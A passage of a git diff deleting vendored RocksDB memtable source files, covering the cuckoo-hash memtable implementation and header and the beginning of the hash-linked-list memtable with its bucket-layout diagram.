-  Allocator* const allocator_;
-  // the number of hash bucket in the hash table.
-  const size_t bucket_count_;
-  // approximate size of each entry
-  const size_t approximate_entry_size_;
-  // the maxinum depth of the cuckoo path.
-  const unsigned int cuckoo_path_max_depth_;
-  // the current number of entries in cuckoo_array_ which has been occupied.
-  size_t occupied_count_;
-  // the current number of hash functions used in the cuckoo hash.
-  unsigned int hash_function_count_;
-  // the backup MemTableRep to handle the case where cuckoo hash cannot find
-  // a vacant bucket for inserting the key of a put request.
-  std::shared_ptr<MemTableRep> backup_table_;
-  // the array to store pointers, pointing to the actual data.
-  std::atomic<char*>* cuckoo_array_;
-  // a buffer to store cuckoo path
-  int* cuckoo_path_;
-  // a boolean flag indicating whether the fullness of bucket array
-  // reaches the point to make the current memtable immutable.
-  bool is_nearly_full_;
-
-  // the default maximum depth of the cuckoo path.
-  static const unsigned int kDefaultCuckooPathMaxDepth = 10;
-
-  CuckooStepBuffer step_buffer_;
-
-  // returns the bucket id assogied to the input slice based on the
-  unsigned int GetHash(const Slice& slice, const int hash_func_id) const {
-    // the seeds used in the Murmur hash to produce different hash functions.
-    static const int kMurmurHashSeeds[HashCuckooRepFactory::kMaxHashCount] = {
-        545609244,  1769731426, 763324157,  13099088,   592422103,
-        1899789565, 248369300,  1984183468, 1613664382, 1491157517};
-    return static_cast<unsigned int>(
-        MurmurHash(slice.data(), static_cast<int>(slice.size()),
-                   kMurmurHashSeeds[hash_func_id]) %
-        bucket_count_);
-  }
-
-  // A cuckoo path is a sequence of bucket ids, where each id points to a
-  // location of cuckoo_array_.  This path describes the displacement sequence
-  // of entries in order to store the desired data specified by the input user
-  // key.  The path starts from one of the locations associated with the
-  // specified user key and ends at a vacant space in the cuckoo array. This
-  // function will update the cuckoo_path.
-  //
-  // @return true if it found a cuckoo path.
-  bool FindCuckooPath(const char* internal_key, const Slice& user_key,
-                      int* cuckoo_path, size_t* cuckoo_path_length,
-                      int initial_hash_id = 0);
-
-  // Perform quick insert by checking whether there is a vacant bucket in one
-  // of the possible locations of the input key.  If so, then the function will
-  // return true and the key will be stored in that vacant bucket.
-  //
-  // This function is a helper function of FindCuckooPath that discovers the
-  // first possible steps of a cuckoo path.  It begins by first computing
-  // the possible locations of the input keys (and stores them in bucket_ids.)
-  // Then, if one of its possible locations is vacant, then the input key will
-  // be stored in that vacant space and the function will return true.
-  // Otherwise, the function will return false indicating a complete search
-  // of cuckoo-path is needed.
-  bool QuickInsert(const char* internal_key, const Slice& user_key,
-                   int bucket_ids[], const int initial_hash_id);
-
-  // Returns the pointer to the internal iterator to the buckets where buckets
-  // are sorted according to the user specified KeyComparator.  Note that
-  // any insert after this function call may affect the sorted nature of
-  // the returned iterator.
-  virtual MemTableRep::Iterator* GetIterator(Arena* arena) override {
-    std::vector<const char*> compact_buckets;
-    for (unsigned int bid = 0; bid < bucket_count_; ++bid) {
-      const char* bucket = cuckoo_array_[bid].load(std::memory_order_relaxed);
-      if (bucket != nullptr) {
-        compact_buckets.push_back(bucket);
-      }
-    }
-    MemTableRep* backup_table = backup_table_.get();
-    if (backup_table != nullptr) {
-      std::unique_ptr<MemTableRep::Iterator> iter(backup_table->GetIterator());
-      for (iter->SeekToFirst(); iter->Valid(); iter->Next()) {
-        compact_buckets.push_back(iter->key());
-      }
-    }
-    if (arena == nullptr) {
-      return new Iterator(
-          std::shared_ptr<std::vector<const char*>>(
-              new std::vector<const char*>(std::move(compact_buckets))),
-          compare_);
-    } else {
-      auto mem = arena->AllocateAligned(sizeof(Iterator));
-      return new (mem) Iterator(
-          std::shared_ptr<std::vector<const char*>>(
-              new std::vector<const char*>(std::move(compact_buckets))),
-          compare_);
-    }
-  }
-};
-
-void HashCuckooRep::Get(const LookupKey& key, void* callback_args,
-                        bool (*callback_func)(void* arg, const char* entry)) {
-  Slice user_key = key.user_key();
-  for (unsigned int hid = 0; hid < hash_function_count_; ++hid) {
-    const char* bucket =
-        cuckoo_array_[GetHash(user_key, hid)].load(std::memory_order_acquire);
-    if (bucket != nullptr) {
-      Slice bucket_user_key = UserKey(bucket);
-      if (user_key == bucket_user_key) {
-        callback_func(callback_args, bucket);
-        break;
-      }
-    } else {
-      // as Put() always stores at the vacant bucket located by the
-      // hash function with the smallest possible id, when we first
-      // find a vacant bucket in Get(), that means a miss.
-      break;
-    }
-  }
-  MemTableRep* backup_table = backup_table_.get();
-  if (backup_table != nullptr) {
-    backup_table->Get(key, callback_args, callback_func);
-  }
-}
-
-void HashCuckooRep::Insert(KeyHandle handle) {
-  static const float kMaxFullness = 0.90f;
-
-  auto* key = static_cast<char*>(handle);
-  int initial_hash_id = 0;
-  size_t cuckoo_path_length = 0;
-  auto user_key = UserKey(key);
-  // find cuckoo path
-  if (FindCuckooPath(key, user_key, cuckoo_path_, &cuckoo_path_length,
-                     initial_hash_id) == false) {
-    // if true, then we can't find a vacant bucket for this key even we
-    // have used up all the hash functions.  Then use a backup memtable to
-    // store such key, which will further make this mem-table become
-    // immutable.
-    if (backup_table_.get() == nullptr) {
-      VectorRepFactory factory(10);
-      backup_table_.reset(
-          factory.CreateMemTableRep(compare_, allocator_, nullptr, nullptr));
-      is_nearly_full_ = true;
-    }
-    backup_table_->Insert(key);
-    return;
-  }
-  // when reaching this point, means the insert can be done successfully.
-  occupied_count_++;
-  if (occupied_count_ >= bucket_count_ * kMaxFullness) {
-    is_nearly_full_ = true;
-  }
-
-  // perform kickout process if the length of cuckoo path > 1.
-  if (cuckoo_path_length == 0) return;
-
-  // the cuckoo path stores the kickout path in reverse order.
-  // so the kickout or displacement is actually performed
-  // in reverse order, which avoids false-negatives on read
-  // by moving each key involved in the cuckoo path to the new
-  // location before replacing it.
-  for (size_t i = 1; i < cuckoo_path_length; ++i) {
-    int kicked_out_bid = cuckoo_path_[i - 1];
-    int current_bid = cuckoo_path_[i];
-    // since we only allow one writer at a time, it is safe to do relaxed read.
-    cuckoo_array_[kicked_out_bid]
-        .store(cuckoo_array_[current_bid].load(std::memory_order_relaxed),
-               std::memory_order_release);
-  }
-  int insert_key_bid = cuckoo_path_[cuckoo_path_length - 1];
-  cuckoo_array_[insert_key_bid].store(key, std::memory_order_release);
-}
-
-bool HashCuckooRep::Contains(const char* internal_key) const {
-  auto user_key = UserKey(internal_key);
-  for (unsigned int hid = 0; hid < hash_function_count_; ++hid) {
-    const char* stored_key =
-        cuckoo_array_[GetHash(user_key, hid)].load(std::memory_order_acquire);
-    if (stored_key != nullptr) {
-      if (compare_(internal_key, stored_key) == 0) {
-        return true;
-      }
-    }
-  }
-  return false;
-}
-
-bool HashCuckooRep::QuickInsert(const char* internal_key, const Slice& user_key,
-                                int bucket_ids[], const int initial_hash_id) {
-  int cuckoo_bucket_id = -1;
-
-  // Below does the followings:
-  // 0. Calculate all possible locations of the input key.
-  // 1. Check if there is a bucket having same user_key as the input does.
-  // 2. If there exists such bucket, then replace this bucket by the newly
-  //    insert data and return.  This step also performs duplication check.
-  // 3. If no such bucket exists but exists a vacant bucket, then insert the
-  //    input data into it.
-  // 4. If step 1 to 3 all fail, then return false.
-  for (unsigned int hid = initial_hash_id; hid < hash_function_count_; ++hid) {
-    bucket_ids[hid] = GetHash(user_key, hid);
-    // since only one PUT is allowed at a time, and this is part of the PUT
-    // operation, so we can safely perform relaxed load.
-    const char* stored_key =
-        cuckoo_array_[bucket_ids[hid]].load(std::memory_order_relaxed);
-    if (stored_key == nullptr) {
-      if (cuckoo_bucket_id == -1) {
-        cuckoo_bucket_id = bucket_ids[hid];
-      }
-    } else {
-      const auto bucket_user_key = UserKey(stored_key);
-      if (bucket_user_key.compare(user_key) == 0) {
-        cuckoo_bucket_id = bucket_ids[hid];
-        break;
-      }
-    }
-  }
-
-  if (cuckoo_bucket_id != -1) {
-    cuckoo_array_[cuckoo_bucket_id].store(const_cast<char*>(internal_key),
-                                          std::memory_order_release);
-    return true;
-  }
-
-  return false;
-}
-
-// Perform pre-check and find the shortest cuckoo path.  A cuckoo path
-// is a displacement sequence for inserting the specified input key.
-//
-// @return true if it successfully found a vacant space or cuckoo-path.
-//     If the return value is true but the length of cuckoo_path is zero,
-//     then it indicates that a vacant bucket or an bucket with matched user
-//     key with the input is found, and a quick insertion is done.
-bool HashCuckooRep::FindCuckooPath(const char* internal_key,
-                                   const Slice& user_key, int* cuckoo_path,
-                                   size_t* cuckoo_path_length,
-                                   const int initial_hash_id) {
-  int bucket_ids[HashCuckooRepFactory::kMaxHashCount];
-  *cuckoo_path_length = 0;
-
-  if (QuickInsert(internal_key, user_key, bucket_ids, initial_hash_id)) {
-    return true;
-  }
-  // If this step is reached, then it means:
-  // 1. no vacant bucket in any of the possible locations of the input key.
-  // 2. none of the possible locations of the input key has the same user
-  //    key as the input `internal_key`.
-
-  // the front and back indices for the step_queue_
-  step_buffer_.reset();
-
-  for (unsigned int hid = initial_hash_id; hid < hash_function_count_; ++hid) {
-    /// CuckooStep& current_step = step_queue_[front_pos++];
-    CuckooStep& current_step = step_buffer_.NextWriteBuffer();
-    current_step.bucket_id_ = bucket_ids[hid];
-    current_step.prev_step_id_ = CuckooStep::kNullStep;
-    current_step.depth_ = 1;
-  }
-
-  while (step_buffer_.HasNewWrite()) {
-    int step_id = step_buffer_.read_index_;
-    const CuckooStep& step = step_buffer_.ReadNext();
-    // Since it's a BFS process, then the first step with its depth deeper
-    // than the maximum allowed depth indicates all the remaining steps
-    // in the step buffer queue will all exceed the maximum depth.
-    // Return false immediately indicating we can't find a vacant bucket
-    // for the input key before the maximum allowed depth.
-    if (step.depth_ >= cuckoo_path_max_depth_) {
-      return false;
-    }
-    // again, we can perform no barrier load safely here as the current
-    // thread is the only writer.
-    Slice bucket_user_key =
-        UserKey(cuckoo_array_[step.bucket_id_].load(std::memory_order_relaxed));
-    if (step.prev_step_id_ != CuckooStep::kNullStep) {
-      if (bucket_user_key == user_key) {
-        // then there is a loop in the current path, stop discovering this path.
-        continue;
-      }
-    }
-    // if the current bucket stores at its nth location, then we only consider
-    // its mth location where m > n.  This property makes sure that all reads
-    // will not miss if we do have data associated to the query key.
-    //
-    // The n and m in the above statement is the start_hid and hid in the code.
-    unsigned int start_hid = hash_function_count_;
-    for (unsigned int hid = 0; hid < hash_function_count_; ++hid) {
-      bucket_ids[hid] = GetHash(bucket_user_key, hid);
-      if (step.bucket_id_ == bucket_ids[hid]) {
-        start_hid = hid;
-      }
-    }
-    // must found a bucket which is its current "home".
-    assert(start_hid != hash_function_count_);
-
-    // explore all possible next steps from the current step.
-    for (unsigned int hid = start_hid + 1; hid < hash_function_count_; ++hid) {
-      CuckooStep& next_step = step_buffer_.NextWriteBuffer();
-      next_step.bucket_id_ = bucket_ids[hid];
-      next_step.prev_step_id_ = step_id;
-      next_step.depth_ = step.depth_ + 1;
-      // once a vacant bucket is found, trace back all its previous steps
-      // to generate a cuckoo path.
-      if (cuckoo_array_[next_step.bucket_id_].load(std::memory_order_relaxed) ==
-          nullptr) {
-        // store the last step in the cuckoo path.  Note that cuckoo_path
-        // stores steps in reverse order.  This allows us to move keys along
-        // the cuckoo path by storing each key to the new place first before
-        // removing it from the old place.  This property ensures reads will
-        // not missed due to moving keys along the cuckoo path.
-        cuckoo_path[(*cuckoo_path_length)++] = next_step.bucket_id_;
-        int depth;
-        for (depth = step.depth_; depth > 0 && step_id != CuckooStep::kNullStep;
-             depth--) {
-          const CuckooStep& prev_step = step_buffer_.steps_[step_id];
-          cuckoo_path[(*cuckoo_path_length)++] = prev_step.bucket_id_;
-          step_id = prev_step.prev_step_id_;
-        }
-        assert(depth == 0 && step_id == CuckooStep::kNullStep);
-        return true;
-      }
-      if (step_buffer_.IsFull()) {
-        // if true, then it reaches maxinum number of cuckoo search steps.
-        return false;
-      }
-    }
-  }
-
-  // tried all possible paths but still not unable to find a cuckoo path
-  // which path leads to a vacant bucket.
-  return false;
-}
-
-HashCuckooRep::Iterator::Iterator(
-    std::shared_ptr<std::vector<const char*>> bucket,
-    const KeyComparator& compare)
-    : bucket_(bucket),
-      cit_(bucket_->end()),
-      compare_(compare),
-      sorted_(false) {}
-
-void HashCuckooRep::Iterator::DoSort() const {
-  if (!sorted_) {
-    std::sort(bucket_->begin(), bucket_->end(),
-              stl_wrappers::Compare(compare_));
-    cit_ = bucket_->begin();
-    sorted_ = true;
-  }
-}
-
-// Returns true iff the iterator is positioned at a valid node.
-bool HashCuckooRep::Iterator::Valid() const {
-  DoSort();
-  return cit_ != bucket_->end();
-}
-
-// Returns the key at the current position.
-// REQUIRES: Valid()
-const char* HashCuckooRep::Iterator::key() const {
-  assert(Valid());
-  return *cit_;
-}
-
-// Advances to the next position.
-// REQUIRES: Valid()
-void HashCuckooRep::Iterator::Next() {
-  assert(Valid());
-  if (cit_ == bucket_->end()) {
-    return;
-  }
-  ++cit_;
-}
-
-// Advances to the previous position.
-// REQUIRES: Valid()
-void HashCuckooRep::Iterator::Prev() {
-  assert(Valid());
-  if (cit_ == bucket_->begin()) {
-    // If you try to go back from the first element, the iterator should be
-    // invalidated. So we set it to past-the-end. This means that you can
-    // treat the container circularly.
-    cit_ = bucket_->end();
-  } else {
-    --cit_;
-  }
-}
-
-// Advance to the first entry with a key >= target
-void HashCuckooRep::Iterator::Seek(const Slice& user_key,
-                                   const char* memtable_key) {
-  DoSort();
-  // Do binary search to find first value not less than the target
-  const char* encoded_key =
-      (memtable_key != nullptr) ? memtable_key : EncodeKey(&tmp_, user_key);
-  cit_ = std::equal_range(bucket_->begin(), bucket_->end(), encoded_key,
-                          [this](const char* a, const char* b) {
-                            return compare_(a, b) < 0;
-                          }).first;
-}
-
-// Retreat to the last entry with a key <= target
-void HashCuckooRep::Iterator::SeekForPrev(const Slice& user_key,
-                                          const char* memtable_key) {
-  assert(false);
-}
-
-// Position at the first entry in collection.
-// Final state of iterator is Valid() iff collection is not empty.
-void HashCuckooRep::Iterator::SeekToFirst() {
-  DoSort();
-  cit_ = bucket_->begin();
-}
-
-// Position at the last entry in collection.
-// Final state of iterator is Valid() iff collection is not empty.
-void HashCuckooRep::Iterator::SeekToLast() {
-  DoSort();
-  cit_ = bucket_->end();
-  if (bucket_->size() != 0) {
-    --cit_;
-  }
-}
-
-}  // anom namespace
-
-MemTableRep* HashCuckooRepFactory::CreateMemTableRep(
-    const MemTableRep::KeyComparator& compare, Allocator* allocator,
-    const SliceTransform* transform, Logger* logger) {
-  // The estimated average fullness.  The write performance of any close hash
-  // degrades as the fullness of the mem-table increases.  Setting kFullness
-  // to a value around 0.7 can better avoid write performance degradation while
-  // keeping efficient memory usage.
-  static const float kFullness = 0.7f;
-  size_t pointer_size = sizeof(std::atomic<const char*>);
-  assert(write_buffer_size_ >= (average_data_size_ + pointer_size));
-  size_t bucket_count =
-    static_cast<size_t>(
-      (write_buffer_size_ / (average_data_size_ + pointer_size)) / kFullness +
-      1);
-  unsigned int hash_function_count = hash_function_count_;
-  if (hash_function_count < 2) {
-    hash_function_count = 2;
-  }
-  if (hash_function_count > kMaxHashCount) {
-    hash_function_count = kMaxHashCount;
-  }
-  return new HashCuckooRep(compare, allocator, bucket_count,
-                           hash_function_count,
-                           static_cast<size_t>(
-                             (average_data_size_ + pointer_size) / kFullness)
-                           );
-}
-
-MemTableRepFactory* NewHashCuckooRepFactory(size_t write_buffer_size,
-                                            size_t average_data_size,
-                                            unsigned int hash_function_count) {
-  return new HashCuckooRepFactory(write_buffer_size, average_data_size,
-                                  hash_function_count);
-}
-
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/memtable/hash_cuckoo_rep.h b/thirdparty/rocksdb/memtable/hash_cuckoo_rep.h
deleted file mode 100644
index 800696e..0000000
--- a/thirdparty/rocksdb/memtable/hash_cuckoo_rep.h
+++ /dev/null
@@ -1,44 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-#ifndef ROCKSDB_LITE
-#include "port/port.h"
-#include "rocksdb/slice_transform.h"
-#include "rocksdb/memtablerep.h"
-
-namespace rocksdb {
-
-class HashCuckooRepFactory : public MemTableRepFactory {
- public:
-  // maxinum number of hash functions used in the cuckoo hash.
-  static const unsigned int kMaxHashCount = 10;
-
-  explicit HashCuckooRepFactory(size_t write_buffer_size,
-                                size_t average_data_size,
-                                unsigned int hash_function_count)
-      : write_buffer_size_(write_buffer_size),
-        average_data_size_(average_data_size),
-        hash_function_count_(hash_function_count) {}
-
-  virtual ~HashCuckooRepFactory() {}
-
-  using MemTableRepFactory::CreateMemTableRep;
-  virtual MemTableRep* CreateMemTableRep(
-      const MemTableRep::KeyComparator& compare, Allocator* allocator,
-      const SliceTransform* transform, Logger* logger) override;
-
-  virtual const char* Name() const override { return "HashCuckooRepFactory"; }
-
- private:
-  size_t write_buffer_size_;
-  size_t average_data_size_;
-  const unsigned int hash_function_count_;
-};
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/memtable/hash_linklist_rep.cc b/thirdparty/rocksdb/memtable/hash_linklist_rep.cc
deleted file mode 100644
index 932b62a..0000000
--- a/thirdparty/rocksdb/memtable/hash_linklist_rep.cc
+++ /dev/null
@@ -1,847 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-
-#ifndef ROCKSDB_LITE
-#include "memtable/hash_linklist_rep.h"
-
-#include <algorithm>
-#include <atomic>
-#include "db/memtable.h"
-#include "memtable/skiplist.h"
-#include "monitoring/histogram.h"
-#include "port/port.h"
-#include "rocksdb/memtablerep.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/slice_transform.h"
-#include "util/arena.h"
-#include "util/murmurhash.h"
-
-namespace rocksdb {
-namespace {
-
-typedef const char* Key;
-typedef SkipList<Key, const MemTableRep::KeyComparator&> MemtableSkipList;
-typedef std::atomic<void*> Pointer;
-
-// A data structure used as the header of a link list of a hash bucket.
-struct BucketHeader {
-  Pointer next;
-  std::atomic<uint32_t> num_entries;
-
-  explicit BucketHeader(void* n, uint32_t count)
-      : next(n), num_entries(count) {}
-
-  bool IsSkipListBucket() {
-    return next.load(std::memory_order_relaxed) == this;
-  }
-
-  uint32_t GetNumEntries() const {
-    return num_entries.load(std::memory_order_relaxed);
-  }
-
-  // REQUIRES: called from single-threaded Insert()
-  void IncNumEntries() {
-    // Only one thread can do write at one time. No need to do atomic
-    // incremental. Update it with relaxed load and store.
-    num_entries.store(GetNumEntries() + 1, std::memory_order_relaxed);
-  }
-};
-
-// A data structure used as the header of a skip list of a hash bucket.
-struct SkipListBucketHeader {
-  BucketHeader Counting_header;
-  MemtableSkipList skip_list;
-
-  explicit SkipListBucketHeader(const MemTableRep::KeyComparator& cmp,
-                                Allocator* allocator, uint32_t count)
-      : Counting_header(this,  // Pointing to itself to indicate header type.
-                        count),
-        skip_list(cmp, allocator) {}
-};
-
-struct Node {
-  // Accessors/mutators for links.  Wrapped in methods so we can
-  // add the appropriate barriers as necessary.
-  Node* Next() {
-    // Use an 'acquire load' so that we observe a fully initialized
-    // version of the returned Node.
-    return next_.load(std::memory_order_acquire);
-  }
-  void SetNext(Node* x) {
-    // Use a 'release store' so that anybody who reads through this
-    // pointer observes a fully initialized version of the inserted node.
-    next_.store(x, std::memory_order_release);
-  }
-  // No-barrier variants that can be safely used in a few locations.
-  Node* NoBarrier_Next() {
-    return next_.load(std::memory_order_relaxed);
-  }
-
-  void NoBarrier_SetNext(Node* x) { next_.store(x, std::memory_order_relaxed); }
-
-  // Needed for placement new below which is fine
-  Node() {}
-
- private:
-  std::atomic<Node*> next_;
-
-  // Prohibit copying due to the below
-  Node(const Node&) = delete;
-  Node& operator=(const Node&) = delete;
-
- public:
-  char key[1];
-};
-
-// Memory structure of the mem table:
-// It is a hash table, each bucket points to one entry, a linked list or a
-// skip list. In order to track total number of records in a bucket to determine
-// whether should switch to skip list, a header is added just to indicate
-// number of entries in the bucket.
-//
-//
-//          +-----> NULL    Case 1. Empty bucket
-//          |
-//          |
-//          | +---> +-------+
-//          | |     | Next  +--> NULL
-//          | |     +-------+
-//  +-----+ | |     |       |  Case 2. One Entry in bucket.
-//  |     +-+ |     | Data  |          next pointer points to
-//  +-----+   |     |       |          NULL. All other cases
-//  |     |   |     |       |          next pointer is not NULL.
-//  +-----+   |     +-------+
-//  |     +---+
-//  +-----+     +-> +-------+  +> +-------+  +-> +-------+
-//  |     |     |   | Next  +--+  | Next  +--+   | Next  +-->NULL
-//  +-----+     |   +-------+     +-------+      +-------+
-//  |     +-----+   | Count |     |       |      |       |
-//  +-----+         +-------+     | Data  |      | Data  |
-//  |     |                       |       |      |       |
-//  +-----+          Case 3.      |       |      |       |
-//  |     |          A header     +-------+      +-------+
-//  +-----+          points to
-//  |     |          a linked list. Count indicates total number
-//  +-----+          of rows in this bucket.
-//  |     |
-//  +-----+    +-> +-------+ <--+
-//  |     |    |   | Next  +----+
-//  +-----+    |   +-------+   Case 4. A header points to a skip
-//  |     +----+   | Count |           list and next pointer points to
-//  +-----+        +-------+           itself, to distinguish case 3 or 4.
-//  |     |        |       |           Count still is kept to indicates total
-//  +-----+        | Skip +-->         of entries in the bucket for debugging
-//  |     |        | List  |   Data    purpose.
-//  |     |        |      +-->
-//  +-----+        |       |
-//  |     |        +-------+
-//  +-----+
-//
-// We don't have data race when changing cases because:
-// (1) When changing from case 2->3, we create a new bucket header, put the
-//     single node there first without changing the original node, and do a
-//     release store when changing the bucket pointer. In that case, a reader
-//     who sees a stale value of the bucket pointer will read this node, while
-//     a reader sees the correct value because of the release store.
-// (2) When changing case 3->4, a new header is created with skip list points
-//     to the data, before doing an acquire store to change the bucket pointer.
-//     The old header and nodes are never changed, so any reader sees any
-//     of those existing pointers will guarantee to be able to iterate to the
-//     end of the linked list.
-// (3) Header's next pointer in case 3 might change, but they are never equal
-//     to itself, so no matter a reader sees any stale or newer value, it will
-//     be able to correctly distinguish case 3 and 4.
-//
-// The reason that we use case 2 is we want to make the format to be efficient
-// when the utilization of buckets is relatively low. If we use case 3 for
-// single entry bucket, we will need to waste 12 bytes for every entry,
-// which can be significant decrease of memory utilization.
-class HashLinkListRep : public MemTableRep {
- public:
-  HashLinkListRep(const MemTableRep::KeyComparator& compare,
-                  Allocator* allocator, const SliceTransform* transform,
-                  size_t bucket_size, uint32_t threshold_use_skiplist,
-                  size_t huge_page_tlb_size, Logger* logger,
-                  int bucket_entries_logging_threshold,
-                  bool if_log_bucket_dist_when_flash);
-
-  virtual KeyHandle Allocate(const size_t len, char** buf) override;
-
-  virtual void Insert(KeyHandle handle) override;
-
-  virtual bool Contains(const char* key) const override;
-
-  virtual size_t ApproximateMemoryUsage() override;
-
-  virtual void Get(const LookupKey& k, void* callback_args,
-                   bool (*callback_func)(void* arg,
-                                         const char* entry)) override;
-
-  virtual ~HashLinkListRep();
-
-  virtual MemTableRep::Iterator* GetIterator(Arena* arena = nullptr) override;
-
-  virtual MemTableRep::Iterator* GetDynamicPrefixIterator(
-       Arena* arena = nullptr) override;
-
- private:
-  friend class DynamicIterator;
-
-  size_t bucket_size_;
-
-  // Maps slices (which are transformed user keys) to buckets of keys sharing
-  // the same transform.
-  Pointer* buckets_;
-
-  const uint32_t threshold_use_skiplist_;
-
-  // The user-supplied transform whose domain is the user keys.
-  const SliceTransform* transform_;
-
-  const MemTableRep::KeyComparator& compare_;
-
-  Logger* logger_;
-  int bucket_entries_logging_threshold_;
-  bool if_log_bucket_dist_when_flash_;
-
-  bool LinkListContains(Node* head, const Slice& key) const;
-
-  SkipListBucketHeader* GetSkipListBucketHeader(Pointer* first_next_pointer)
-      const;
-
-  Node* GetLinkListFirstNode(Pointer* first_next_pointer) const;
-
-  Slice GetPrefix(const Slice& internal_key) const {
-    return transform_->Transform(ExtractUserKey(internal_key));
-  }
-
-  size_t GetHash(const Slice& slice) const {
-    return MurmurHash(slice.data(), static_cast<int>(slice.size()), 0) %
-           bucket_size_;
-  }
-
-  Pointer* GetBucket(size_t i) const {
-    return static_cast<Pointer*>(buckets_[i].load(std::memory_order_acquire));
-  }
-
-  Pointer* GetBucket(const Slice& slice) const {
-    return GetBucket(GetHash(slice));
-  }
-
-  bool Equal(const Slice& a, const Key& b) const {
-    return (compare_(b, a) == 0);
-  }
-
-  bool Equal(const Key& a, const Key& b) const { return (compare_(a, b) == 0); }
-
-  bool KeyIsAfterNode(const Slice& internal_key, const Node* n) const {
-    // nullptr n is considered infinite
-    return (n != nullptr) && (compare_(n->key, internal_key) < 0);
-  }
-
-  bool KeyIsAfterNode(const Key& key, const Node* n) const {
-    // nullptr n is considered infinite
-    return (n != nullptr) && (compare_(n->key, key) < 0);
-  }
-
-  bool KeyIsAfterOrAtNode(const Slice& internal_key, const Node* n) const {
-    // nullptr n is considered infinite
-    return (n != nullptr) && (compare_(n->key, internal_key) <= 0);
-  }
-
-  bool KeyIsAfterOrAtNode(const Key& key, const Node* n) const {
-    // nullptr n is considered infinite
-    return (n != nullptr) && (compare_(n->key, key) <= 0);
-  }
-
-  Node* FindGreaterOrEqualInBucket(Node* head, const Slice& key) const;
-  Node* FindLessOrEqualInBucket(Node* head, const Slice& key) const;
-
-  class FullListIterator : public MemTableRep::Iterator {
-   public:
-    explicit FullListIterator(MemtableSkipList* list, Allocator* allocator)
-        : iter_(list), full_list_(list), allocator_(allocator) {}
-
-    virtual ~FullListIterator() {
-    }
-
-    // Returns true iff the iterator is positioned at a valid node.
-    virtual bool Valid() const override { return iter_.Valid(); }
-
-    // Returns the key at the current position.
-    // REQUIRES: Valid()
-    virtual const char* key() const override {
-      assert(Valid());
-      return iter_.key();
-    }
-
-    // Advances to the next position.
-    // REQUIRES: Valid()
-    virtual void Next() override {
-      assert(Valid());
-      iter_.Next();
-    }
-
-    // Advances to the previous position.
-    // REQUIRES: Valid()
-    virtual void Prev() override {
-      assert(Valid());
-      iter_.Prev();
-    }
-
-    // Advance to the first entry with a key >= target
-    virtual void Seek(const Slice& internal_key,
-                      const char* memtable_key) override {
-      const char* encoded_key =
-          (memtable_key != nullptr) ?
-              memtable_key : EncodeKey(&tmp_, internal_key);
-      iter_.Seek(encoded_key);
-    }
-
-    // Retreat to the last entry with a key <= target
-    virtual void SeekForPrev(const Slice& internal_key,
-                             const char* memtable_key) override {
-      const char* encoded_key = (memtable_key != nullptr)
-                                    ? memtable_key
-                                    : EncodeKey(&tmp_, internal_key);
-      iter_.SeekForPrev(encoded_key);
-    }
-
-    // Position at the first entry in collection.
-    // Final state of iterator is Valid() iff collection is not empty.
-    virtual void SeekToFirst() override { iter_.SeekToFirst(); }
-
-    // Position at the last entry in collection.
-    // Final state of iterator is Valid() iff collection is not empty.
-    virtual void SeekToLast() override { iter_.SeekToLast(); }
-   private:
-    MemtableSkipList::Iterator iter_;
-    // To destruct with the iterator.
-    std::unique_ptr<MemtableSkipList> full_list_;
-    std::unique_ptr<Allocator> allocator_;
-    std::string tmp_;       // For passing to EncodeKey
-  };
-
-  class LinkListIterator : public MemTableRep::Iterator {
-   public:
-    explicit LinkListIterator(const HashLinkListRep* const hash_link_list_rep,
-                              Node* head)
-        : hash_link_list_rep_(hash_link_list_rep),
-          head_(head),
-          node_(nullptr) {}
-
-    virtual ~LinkListIterator() {}
-
-    // Returns true iff the iterator is positioned at a valid node.
-    virtual bool Valid() const override { return node_ != nullptr; }
-
-    // Returns the key at the current position.
-    // REQUIRES: Valid()
-    virtual const char* key() const override {
-      assert(Valid());
-      return node_->key;
-    }
-
-    // Advances to the next position.
-    // REQUIRES: Valid()
-    virtual void Next() override {
-      assert(Valid());
-      node_ = node_->Next();
-    }
-
-    // Advances to the previous position.
-    // REQUIRES: Valid()
-    virtual void Prev() override {
-      // Prefix iterator does not support total order.
-      // We simply set the iterator to invalid state
-      Reset(nullptr);
-    }
-
-    // Advance to the first entry with a key >= target
-    virtual void Seek(const Slice& internal_key,
-                      const char* memtable_key) override {
-      node_ = hash_link_list_rep_->FindGreaterOrEqualInBucket(head_,
-                                                              internal_key);
-    }
-
-    // Retreat to the last entry with a key <= target
-    virtual void SeekForPrev(const Slice& internal_key,
-                             const char* memtable_key) override {
-      // Since we do not support Prev()
-      // We simply do not support SeekForPrev
-      Reset(nullptr);
-    }
-
-    // Position at the first entry in collection.
-    // Final state of iterator is Valid() iff collection is not empty.
-    virtual void SeekToFirst() override {
-      // Prefix iterator does not support total order.
-      // We simply set the iterator to invalid state
-      Reset(nullptr);
-    }
-
-    // Position at the last entry in collection.
-    // Final state of iterator is Valid() iff collection is not empty.
-    virtual void SeekToLast() override {
-      // Prefix iterator does not support total order.
-      // We simply set the iterator to invalid state
-      Reset(nullptr);
-    }
-
-   protected:
-    void Reset(Node* head) {
-      head_ = head;
-      node_ = nullptr;
-    }
-   private:
-    friend class HashLinkListRep;
-    const HashLinkListRep* const hash_link_list_rep_;
-    Node* head_;
-    Node* node_;
-
-    virtual void SeekToHead() {
-      node_ = head_;
-    }
-  };
-
-  class DynamicIterator : public HashLinkListRep::LinkListIterator {
-   public:
-    explicit DynamicIterator(HashLinkListRep& memtable_rep)
-        : HashLinkListRep::LinkListIterator(&memtable_rep, nullptr),
-          memtable_rep_(memtable_rep) {}
-
-    // Advance to the first entry with a key >= target
-    virtual void Seek(const Slice& k, const char* memtable_key) override {
-      auto transformed = memtable_rep_.GetPrefix(k);
